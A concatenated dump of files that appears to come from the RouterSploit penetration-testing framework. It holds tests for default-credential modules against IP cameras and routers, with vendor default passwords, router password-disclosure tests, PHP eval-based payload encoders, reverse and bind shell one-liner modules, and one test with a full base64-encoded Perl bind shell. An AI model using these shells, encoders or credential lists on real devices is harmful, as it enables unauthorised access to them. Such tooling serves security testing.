/tests/creds/cameras/basler/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.basler.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/canon/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.canon.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:camera"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/cisco/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.cisco.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/dlink/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.dlink.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/siemens/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.siemens.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/stardot/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.stardot.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/vacron/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.vacron.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/generic/test_ftp_default.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.ftp_default import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 8 12 | assert type(exploit.defaults) is list 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/generic/test_ssh_default.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.ssh_default import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 8 12 | assert type(exploit.defaults) is list 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/belkin/test_g_n150_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.belkin.g_n150_password_disclosure import Exploit 2 | 3 | 4 | def test_exploit_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | route_mock = target.get_route_mock("/login.stm", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "test" 10 | "password= \"admin1234\"" 11 | "test" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dir_300_320_615_auth_bypass.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.dlink.dir_300_320_615_auth_bypass import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/bsc_lan.php", methods=["GET"]) 8 | route_mock.return_value = ( 9 | '
' 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | 17 | exploit.target = target.host 18 | exploit.port = target.port 19 | 20 | assert exploit.check() is False 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/php/hex.py: -------------------------------------------------------------------------------- 1 | from binascii import hexlify 2 | from routersploit.core.exploit.encoders import BaseEncoder 3 | from routersploit.core.exploit.payloads import Architectures 4 | 5 | 6 | class Encoder(BaseEncoder): 7 | __info__ = { 8 | "name": "PHP Hex Encoder", 9 | "description": "Module encodes PHP payload to Hex format.", 10 | "authors": ( 11 | "Marcin Bury ", # routersploit module 12 | ), 13 | } 14 | 15 | architecture = Architectures.PHP 16 | 17 | def encode(self, payload): 18 | encoded_payload = str(hexlify(bytes(payload, "utf-8")), "utf-8") 19 | return "eval(hex2bin('{}'));".format(encoded_payload) 20 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/python_bind_udp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.python.bind_udp import Payload as PythonBindUDP 3 | 4 | 5 | class Payload(PythonBindUDP): 6 | __info__ = { 7 | "name": "Python Bind UDP One-Liner", 8 | "description": "Creates interactive udp bind shell by using python one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ) 12 | } 13 | 14 | cmd = OptString("python", "Python binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -c "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/brickcom/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.brickcom.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/geovision/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.geovision.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/hikvision/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.hikvision.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH jserver """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:12345"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/honeywell/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.honeywell.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/mobotix/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.mobotix.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:meinsm"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/sentry360/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.sentry360.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/python_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.python.bind_tcp import Payload as PythonBindTCP 3 | 4 | 5 | class Payload(PythonBindTCP): 6 | __info__ = { 7 | "name": "Python Reverse TCP One-Liner", 8 | "description": "Creates interactive tcp bind shell by using python one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("python", "Python binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -c "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/axis/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.axis.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:pass", "admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/grandstream/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.grandstream.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/iqinvision/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.iqinvision.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:system"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/videoiq/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.videoiq.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["supervisor:supervisor"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/generic/test_telnet_default.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.telnet_default import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 8 12 | assert type(exploit.defaults) is list 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/asus/test_rt_n16_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.asus.rt_n16_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/error_page.htm", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "test" 10 | "if('1' == '0' || 'admin1234' == 'admin')" 11 | "test" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 8080 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /tests/exploits/routers/technicolor/test_tc7200_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "TEST" 10 | "0MLog" 11 | "TEST" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/perl_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.perl.reverse_tcp import Payload as PerlReverseTCP 3 | 4 | 5 | class Payload(PerlReverseTCP): 6 | __info__ = { 7 | "name": "Perl Reverse TCP One-Liner", 8 | "description": "Creates interactive tcp reverse shell by using perl one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("perl", "Perl binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + " -MIO -e \"{}\"" 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/python_reverse_udp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.python.reverse_udp import Payload as PythonBindUDP 3 | 4 | 5 | class Payload(PythonBindUDP): 6 | __info__ = { 7 | "name": "Python Reverse UDP One-Liner", 8 | "description": "Creates interactive udp reverse shell by using python one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ) 12 | } 13 | 14 | cmd = OptString("python", "Python binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -c "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/jvc/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.jvc.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:jvc"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/exploits/routers/huawei/test_hg530_hg520b_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.huawei.hg530_hg520b_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | cgi_mock = target.get_route_mock("/UD/", methods=["POST"]) 8 | cgi_mock.return_value = ( 9 | 'TEST' 10 | 'Admin1234' 11 | 'TEST' 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_perl_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.perl_bind_tcp import Payload 2 | 3 | 4 | # perl bind tcp payload with rport=4321 5 | bind_tcp = ( 6 | "perl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\"" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.rport = 4321 15 | 16 | assert payload.run() == bind_tcp 17 | -------------------------------------------------------------------------------- /tests/creds/cameras/avigilon/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avigilon.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "Administrator:"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/canon/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.canon.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:camera"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/cisco/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.cisco.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/dlink/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.dlink.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/speco/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.speco.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.zyxel.d1000_wifi_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/UD/act", methods=["POST"]) 8 | route_mock.return_value = ( 9 | "TEST" 10 | "Admin1234" 11 | "TEST" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 7547 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/php/base64.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from routersploit.core.exploit.encoders import BaseEncoder 3 | from routersploit.core.exploit.payloads import Architectures 4 | 5 | 6 | class Encoder(BaseEncoder): 7 | __info__ = { 8 | "name": "PHP Base64 Encoder", 9 | "description": "Module encodes PHP payload to Base64 format.", 10 | "authors": ( 11 | "Marcin Bury ", # routersploit module 12 | ), 13 | } 14 | 15 | architecture = Architectures.PHP 16 | 17 | def encode(self, payload): 18 | encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") 19 | return "eval(base64_decode('{}'));".format(encoded_payload) 20 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/python_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.python.reverse_tcp import Payload as PythonReverseTCP 3 | 4 | 5 | class Payload(PythonReverseTCP): 6 | __info__ = { 7 | "name": "Python Reverse TCP One-Liner", 8 | "description": "Creates interactive tcp reverse shell by using python one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("python", "Python binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -c "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/arecont/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.arecont.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:", ":"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/avtech/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avtech.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/basler/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.basler.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/mobotix/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.mobotix.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | 